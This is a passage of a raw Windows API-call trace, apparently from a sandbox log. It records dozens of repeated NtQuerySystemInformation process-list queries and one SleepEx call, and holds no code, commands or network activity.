SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.851] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0069.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0069.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: 